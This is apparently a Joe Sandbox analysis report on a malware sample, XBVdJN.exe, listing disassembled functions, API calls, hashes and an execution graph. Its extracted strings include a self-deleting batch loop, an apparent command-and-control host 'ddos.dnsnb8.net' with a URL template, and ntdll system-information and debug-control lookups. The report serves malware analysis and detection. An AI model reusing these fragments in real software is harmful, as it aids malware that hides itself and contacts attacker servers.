                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                                                                                                                                                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$open
                                                                                                                                                                                                                          • API String ID: 617340118-2664338557
                                                                                                                                                                                                                          • Opcode ID: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                                                                                                                                                                                          • Instruction ID: 682dd6be1649bc4cf1145427bd67510adcabb956e54ac084ab20c58eadce3696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77119476A011387ED720D7A49C89DEB7BBDDF19311F080052F94AE2240DA709BC48BB0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00611400), ref: 00611226
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0061122D
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00611400), ref: 0061123F
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00611400), ref: 00611250
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 0061129E
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 006112B0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 006112F5
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00611400), ref: 0061130A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ntdll.dll, xrefs: 00611219
                                                                                                                                                                                                                          • ZwQuerySystemInformation, xrefs: 00611212
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00611262
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1500695312-2647507469
                                                                                                                                                                                                                          • Opcode ID: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                                                                                                                                                                                          • Instruction ID: 985721c64ea5cc395d24c478363774f2c887ad37c5db5a3bdf41059701d51842
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21D771605361ABD7209B65CC04BEBBAAAFB4AB01F184919F646DA340C770DBC4C7A5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006118B1
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006118D3
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(I%a), ref: 006118E9
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006118F0
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00611901
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0061190A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                                                                                                                                                          • String ID: I%a
                                                                                                                                                                                                                          • API String ID: 876959470-1380773492
                                                                                                                                                                                                                          • Opcode ID: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                                                                                                                                                                                          • Instruction ID: cde36df8c25317c441865b7b1ab77e7c391a828d342c310b196f82e5228e60da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A017176901128BBCB216B95DC48DDF7F7EEF85761F148022FA16A52A0D6314A58CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00611878
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00611880
                                                                                                                                                                                                                          • srand.MSVCRT ref: 00611890
                                                                                                                                                                                                                          • rand.MSVCRT ref: 00611894
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Timerandsrand$FileSystem
                                                                                                                                                                                                                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                                                                                                                          • API String ID: 4106363736-3273462101
                                                                                                                                                                                                                          • Opcode ID: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                                                                                                                                                                                          • Instruction ID: c1b5b4cf5bb4b794c46a5da15c6d932d7a54522c4de6e93580757275ac153ae0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0D877A00228BBDB00A7F9EC468DEBBECDE88162B140567F601D3350E570FD448AB8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006129DB,?,00000001), ref: 006126A7
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006129DB,?,00000001), ref: 006126B5
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 006126C4
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 006126CE
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000004,?), ref: 006126E3
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000004), ref: 0061271F
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0061272D
                                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 0061273C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 41106472-0
                                                                                                                                                                                                                          • Opcode ID: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                                                                                                                                                                                          • Instruction ID: e3b1c58b3940e7abda374c4e77bbbd2e0fdc09e083f16dbacfa785d18bee4ec2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA117C35900111AFCB219F15EC588DA7BABFF8476171C902BF455C7260DB308995DB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • .exe, xrefs: 00611C57
                                                                                                                                                                                                                          • ygXvIMcqsaxXqKEBzmehMnFdOUDHSuddhfoLNTIrVrbZUqEYtGWmJHTwCgbwJfjNbAlFuTtDVROuDJaRBnkmzxigQSOAyrESjPGIhevCWWpUiLYCBvZAQHLjQPckKPwVifoplsznxtRpeMacsZoNyXlkGYKF, xrefs: 00611B8A, 00611B9C, 00611C15, 00611C49
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcatmemcpymemsetrandsrand
                                                                                                                                                                                                                          • String ID: .exe$ygXvIMcqsaxXqKEBzmehMnFdOUDHSuddhfoLNTIrVrbZUqEYtGWmJHTwCgbwJfjNbAlFuTtDVROuDJaRBnkmzxigQSOAyrESjPGIhevCWWpUiLYCBvZAQHLjQPckKPwVifoplsznxtRpeMacsZoNyXlkGYKF
                                                                                                                                                                                                                          • API String ID: 122620767-3976719805
                                                                                                                                                                                                                          • Opcode ID: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                                                                                                                                                                                          • Instruction ID: ecb8549ff3b7afa9f0a006c442787cc1df0b38573a911927a68794d2c5b03a3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521A032E481A06ED75513357C41BED3F478FE7711F2E909AF6861F3B2D56809C682A4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00611334
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0061133B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00611359
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                                                                          • String ID: NtSystemDebugControl$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3137504439-2438149413
                                                                                                                                                                                                                          • Opcode ID: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                                                                                                                                                                                          • Instruction ID: 78a7aec5fdf026b9ac8cb92c97bdedef9be55be53ea7163f3b40c93f0e5bfd36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801C47160034DBFDB10DF94EC859EFBBBAFB05304F08452BFA12A6240D7708685CA90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3636361484-0
                                                                                                                                                                                                                          • Opcode ID: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                                                                                                                                                                                          • Instruction ID: 70c8c8ec320e6e42b55024cf691f3d360f9a00e9c5fbcbf0844b3361ca4f8d26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD01FE729042696FEB1057A0EC48BD67BDEDB05311F0C4067DB46D7190EA749AC4CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0061603C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00616064), ref: 0061604F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-1793498882
                                                                                                                                                                                                                          • Opcode ID: 920401851291069f47bc996d62c2fe92e70689a7150833ea92fecf21b10b095d
                                                                                                                                                                                                                          • Instruction ID: 71c40daf84fa9db84eb83f6602c50a9cf279caeb9d543895bd2a8f9da7b95c67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 920401851291069f47bc996d62c2fe92e70689a7150833ea92fecf21b10b095d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0F0B61402898FEF70CEA4CC44BDE3BE5EB15700F54442AFA09CB281CB788685CB24

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:13.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:8.5%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:1272
                                                                                                                                                                                                                          Total number of Limit Nodes:29
                                                                                                                                                                                                                          execution_graph 14347 40fc5d InvalidateRect 14348 40fc71 14347->14348 13210 479000 13212 479044 GetPEB 13210->13212 13214 479077 CreateFileA 13212->13214 13215 47922d 13214->13215 14349 429b0c HeapCreate 14350 429b30 14349->14350 13216 40b517 13217 40b5b5 17 API calls 13216->13217 13218 40b54c 13216->13218 13221 40b812 CreateWindowExA 13217->13221 13222 40b80c 13217->13222 13218->13217 13220 40b564 GetDlgItem GetClientRect MoveWindow InvalidateRect 13218->13220 13220->13217 13223 40b840 9 API calls 13221->13223 13222->13223 13224 40b925 8 API calls 13223->13224 13226 40ba82 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13224->13226 13228 40baf1 13226->13228 13229 40bb31 13 API calls 13228->13229 13230 40bcb2 13229->13230 13231 40bcb8 CreateWindowExA 13229->13231 13232 40bce6 9 API calls 13230->13232 13231->13232 13233 40bdda 13232->13233 13234 40be06 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13233->13234 13235 40bea8 13234->13235 13236 40beac CreateWindowExA 13234->13236 13237 40beda 9 API calls 13235->13237 13236->13237 13238 40c012 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13237->13238 13241 40c06e 13238->13241 13240 40f15e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13241->13240 13242 40c0fe CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13241->13242 13247 40c0ad GetDlgItem GetClientRect MoveWindow InvalidateRect 13241->13247 13243 40c1b3 13242->13243 13244 40c1b9 CreateWindowExA 13242->13244 13245 40c1e7 9 API calls 13243->13245 13244->13245 13246 40c2cc CreateFontIndirectA SelectObject SendMessageA SetTextColor 13245->13246 13249 40c3a8 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13246->13249 13247->13242 13251 40c488 8 API calls 13249->13251 13253 40c595 13251->13253 13254 40f116 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13251->13254 13255 40c604 13 API calls 13253->13255 13259 40c5b4 GetDlgItem GetClientRect MoveWindow InvalidateRect 13253->13259 13254->13240 13256 40c790 CreateWindowExA 13255->13256 13257 40c78a 13255->13257 13258 40c7be 9 API calls 13256->13258 13257->13258 13261 40c88c 13258->13261 13259->13255 13260 40f0ce SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13260->13254 13261->13260 13262 40c91e CreateFontIndirectA SelectObject SendMessageA SetTextColor 13261->13262 13263 40c8cd GetDlgItem GetClientRect MoveWindow InvalidateRect 13261->13263 13265 40c9f2 13262->13265 13266 40f086 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13262->13266 13263->13262 13267 40ca62 9 API calls 13265->13267 13269 40ca11 GetDlgItem GetClientRect MoveWindow InvalidateRect 13265->13269 13266->13260 13270 40cbb7 13267->13270 13271 40cbbd CreateWindowExA 13267->13271 13269->13267 13272 40cbeb 9 API calls 13270->13272 13271->13272 13273 40cd23 12 API calls 13272->13273 13275 40f03e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13273->13275 13276 40ce5f 13273->13276 13275->13266 13277 40cece 8 API calls 13276->13277 13279 40ce7e GetDlgItem GetClientRect MoveWindow InvalidateRect 13276->13279 13278 40d01e CreateFontIndirectA SelectObject SendMessageA SetTextColor 13277->13278 13281 40d084 13278->13281 13282 40eff6 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13278->13282 13279->13277 13283 40d0ff 8 API calls 13281->13283 13286 40d0a3 GetDlgItem GetClientRect MoveWindow InvalidateRect 13281->13286 13282->13275 13284 40d243 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13283->13284 13287 40d309 17 API calls 13284->13287 13286->13283 13289 40d4d3 13287->13289 13290 40d4d9 CreateWindowExA 13287->13290 13291 40d507 9 API calls 13289->13291 13290->13291 13293 40d5f2 13291->13293 13292 40efae SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13292->13282 13293->13292 13294 40d6d9 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13293->13294 13296 40d688 GetDlgItem GetClientRect MoveWindow InvalidateRect 13293->13296 13297 40d7c9 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13294->13297 13298 40d7ac 13294->13298 13296->13294 13299 40d877 13297->13299 13300 40d87d CreateWindowExA 13297->13300 13298->13297 13301 40d8ab 9 API calls 13299->13301 13300->13301 13303 40d979 13301->13303 13302 40ef66 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13302->13292 13303->13302 13304 40da0b 9 API calls 13303->13304 13305 40d9ba GetDlgItem GetClientRect MoveWindow InvalidateRect 13303->13305 13307 40db73 CreateWindowExA 13304->13307 13308 40db6d 13304->13308 13305->13304 13309 40dba1 9 API calls 13307->13309 13308->13309 13310 40dc70 8 API calls 13309->13310 13312 40ef1e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13310->13312 13313 40dd6e 13310->13313 13312->13302 13314 40ddd8 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13313->13314 13319 40dd8d GetDlgItem GetClientRect MoveWindow InvalidateRect 13313->13319 13315 40de87 13314->13315 13316 40de8d CreateWindowExA 13314->13316 13317 40debb 9 API calls 13315->13317 13316->13317 13318 40df8a 13 API calls 13317->13318 13321 40e130 CreateWindowExA 13318->13321 13322 40e12a 13318->13322 13319->13314 13323 40e15e 9 API calls 13321->13323 13322->13323 13324 40e29d CreateFontIndirectA SelectObject SendMessageA SetTextColor 13323->13324 13328 40e303 13324->13328 13326 40eed6 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13326->13312 13327 40e3a6 CreateFontIndirectA SelectObject SendMessageA SetTextColor 13331 40e49b 13327->13331 13328->13326 13328->13327 13329 40e34f GetDlgItem GetClientRect MoveWindow InvalidateRect 13328->13329 13329->13327 13332 40e4c8 13331->13332 13333 40ee8e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 13331->13333 13334 40e54e CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 13332->13334 13340 40e4ee GetDlgItem GetClientRect MoveWindow InvalidateRect 13332->13340 13333->13326 13336 40e620 CreateWindowExA 13334->13336 13337 40e61c 13334->13337 13338 40e64e 18 API calls 13336->13338 13337->13338 13339 40eb2b SendMessageA SetTimer TrackPopupMenuEx 13338->13339 13346 40e825 SHGetDesktopFolder 13338->13346 13342 40eb96 KillTimer 13339->13342 13343 40eb9f BeginPaint IsRectEmpty 13339->13343 13340->13334 13342->13343 13344 40ebf2 EndPaint GetClientRect 13343->13344 13345 40ebc6 GetSystemTime SetTimer 13343->13345 13347 40ec2e 13344->13347 13345->13344 13348 40e8de 13346->13348 13349 40ecf7 GetCursorInfo 13347->13349 13350 40ec38 SelectObject 13347->13350 13348->13339 13353 40ed4b GetCursorPos WindowFromPoint 13349->13353 13354 40ed2f 13349->13354 13351 40ecf0 DeleteDC 13350->13351 13352 40ec4b GetObjectA 13350->13352 13351->13349 13355 40ec65 GetClientRect StretchBlt 13352->13355 13356 40ece8 SelectObject 13352->13356 13357 40ed71 GetWindowThreadProcessId GetCurrentThreadId 13353->13357 13358 40edac GetCursor 13353->13358 13354->13353 13355->13356 13356->13351 13357->13358 13360 40ed88 AttachThreadInput 13357->13360 13359 40edb2 13358->13359 13362 40ee00 EnumFontFamiliesA GetActiveWindow 13359->13362 13364 40edda StrRetToStrA 13359->13364 13360->13358 13361 40ed96 GetCursor AttachThreadInput 13360->13361 13361->13358 13361->13359 13373 410c90 13362->13373 13364->13362 13366 40edef 13364->13366 13396 424ee2 13366->13396 13367 40ee4a 13413 411160 13367->13413 13372 40ee65 13374 410ca2 13373->13374 13375 410dc9 RaiseException 13373->13375 13374->13375 13376 410caa GetCurrentThreadId RtlEnterCriticalSection RtlLeaveCriticalSection 13374->13376 13375->13367 13432 423370 RtlEnterCriticalSection RegisterClipboardFormatA RegisterClipboardFormatA GetClassInfoExA 13376->13432 13378 410ce4 FindResourceA 13379 410d8f 13378->13379 13380 410cfc FindResourceA 13378->13380 13379->13367 13381 410d11 LoadResource LockResource 13380->13381 13382 410d24 13380->13382 13383 410d26 LoadResource 13381->13383 13382->13383 13384 410d36 LockResource 13383->13384 13385 410dba GetLastError 13383->13385 13387 410d43 13384->13387 13388 410dab GetLastError 13384->13388 13386 410d8b 13385->13386 13386->13379 13390 410da2 SetLastError 13386->13390 13447 410df0 13387->13447 13388->13386 13390->13379 13391 410d4a DialogBoxIndirectParamA 13392 410d71 GetLastError 13391->13392 13393 410d68 13391->13393 13394 410d6d 13392->13394 13393->13392 13393->13394 13394->13386 13395 410d7d GlobalHandle GlobalFree 13394->13395 13395->13386 13397 424eee __lseeki64 13396->13397 13398 424f19 __flsbuf 13397->13398 13399 424efc 13397->13399 13784 4272b4 13398->13784 13400 427ffb __lseeki64 44 API calls 13399->13400 13401 424f01 13400->13401 13402 42515e __lseeki64 4 API calls 13401->13402 13406 424f11 __lseeki64 13402->13406 13404 424f2b __flsbuf 13789 427351 13404->13789 13406->13362 13407 424f3d __flsbuf 13796 427421 13407->13796 13409 424f55 __flsbuf 13815 4273ed 13409->13815 14196 411180 13413->14196 13416 40ee5b 13418 411720 RtlEnterCriticalSection 13416->13418 13419 41177c 